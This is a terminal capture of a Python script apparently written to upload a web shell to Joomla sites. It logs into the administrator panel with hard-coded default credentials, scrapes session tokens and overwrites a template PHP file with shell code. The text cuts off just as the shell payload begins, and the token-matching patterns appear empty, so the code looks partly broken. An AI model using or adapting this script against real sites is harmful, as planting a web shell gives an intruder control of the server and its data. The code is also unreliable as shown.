c@kali:~/src/napalm2.2/modules$ cat shell-joomla.py #!/usr/bin/env python # joomla_shellup.py - small script to upload shell in Joomla # # 02.05.2017, rewrited: 27.05 # -- hint -- # To exploit this "feature" you will need valid credentials.' # Based on latest (3.6.5-1) version.' # Tested also on: 3.7.x import requests import re target = raw_input("[+] Hostname >> ") print '[+] Checking: ' + str(target) # initGET session = requests.session() initlink = target + '/administrator/index.php' initsend = session.get(initlink) initresp = initsend.text find_token = re.compile('') found_token = re.search(find_token, initresp) if found_token: initToken = found_token.group(1) print '[+] Found init token: ' + initToken print '[+] Preparing login request' data_login = { 'username':'user', 'passwd':'bitnami', 'lang':'', 'option':'com_login', 'task':'login', 'return':'aW5kZXgucGhw', initToken:'1' } data_link = initlink doLogin = session.post(data_link, data=data_login) loginResp = doLogin.text print '[+] At this stage we should be logged-in as an admin :)' uplink = target + '/administrator/index.php?option=com_templates&view=template&id=503&file=L2pzc3RyaW5ncy5waHA%3D' filename = 'jsstrings.php' print '[+] File to change: ' + str(filename) getnewtoken = session.get(uplink) getresptoken = getnewtoken.text newToken = re.compile('') newFound = re.search(newToken, getresptoken) if newFound: newOneTok = newFound.group(1) print '[+] Grabbing new token from logged-in user: ' + newOneTok getjs = target+'/administrator/index.php?option=com_templates&view=template&id=503&file=L2pzc3RyaW5ncy5waHA%3D' getjsreq = session.get(getjs) getjsresp = getjsreq.text # print getjsresp print '[+] Shellname: ' + filename shlink = target + '/administrator/index.php?option=com_templates&view=template&id=503&file=L2pzc3RyaW5ncy5waHA=' shdata_up = { 'jform[source]':'